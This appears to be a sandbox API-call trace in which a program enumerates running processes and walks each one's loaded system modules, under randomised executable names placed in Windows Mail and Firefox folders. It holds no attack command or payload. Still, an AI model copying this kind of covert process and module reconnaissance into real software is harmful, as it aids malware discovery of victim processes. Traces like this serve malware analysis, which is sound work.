	[0106.140] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.141] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.142] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.160] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.160] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.161] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.162] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.163] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.163] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.164] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.165] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.166] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 0
	[0106.167] Module32FirstW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Windows Mail\\wool-parish-horses.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Windows Mail\\wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 53
	[0106.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 23
	[0106.167] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.168] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.169] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.170] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.171] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.171] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.172] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.173] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.174] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.175] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.176] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.177] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.178] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.178] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0106.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0106.179] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.180] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.181] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.182] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 0
	[0106.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 23
	[0106.183] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoken-delayed.exe")) returned 1
	[0106.183] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xf44) returned 0x860
	[0106.191] Module32FirstW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.192] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.192] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.208] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.208] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.209] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.210] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.211] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.212] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.212] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.213] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.214] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.215] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.215] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.216] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.217] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.218] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.218] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.219] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 0
	[0106.220] Module32FirstW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Mozilla Firefox\\spoken-delayed.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Mozilla Firefox\\spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 52
	[0106.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 19
	[0106.221] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.222] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.222] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.223] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.224] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.225] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.226] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.226] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.227] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.228] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.229] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.229] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.230] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
	[0106.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.231] Module32NextW (hSnapshot=0x860, lpme=0x20af280) returned 1
